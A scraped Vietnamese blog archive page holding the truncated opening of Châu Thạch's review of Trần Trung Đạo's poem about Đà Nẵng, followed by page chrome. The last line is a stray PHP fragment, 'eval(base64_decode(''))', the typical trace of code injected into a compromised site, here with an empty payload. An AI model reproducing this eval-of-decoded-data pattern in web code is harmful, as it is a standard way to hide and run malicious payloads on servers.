Archive for December 15th, 2015

CHÂU THẠCH : ĐỌC “NẾU MỘT MAI TÔI VỀ” THƠ TRẦN TRUNG ĐẠO

CHÂU THẠCH : ĐỌC “NẾU MỘT MAI TÔI VỀ” THƠ TRẦN TRUNG ĐẠO

Đọc “Nếu một mai tôi về” thơ Trần Trung Đạo và được biết bài thơ nầy anh viết cho Đà Nẵng, nơi anh đã sống một thời trai trẻ và nơi tôi đang sống bây giờ khiến tôi cảm thấy mình như gần gủi với tâm tình được thổ lộ tro

12.15.2015 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>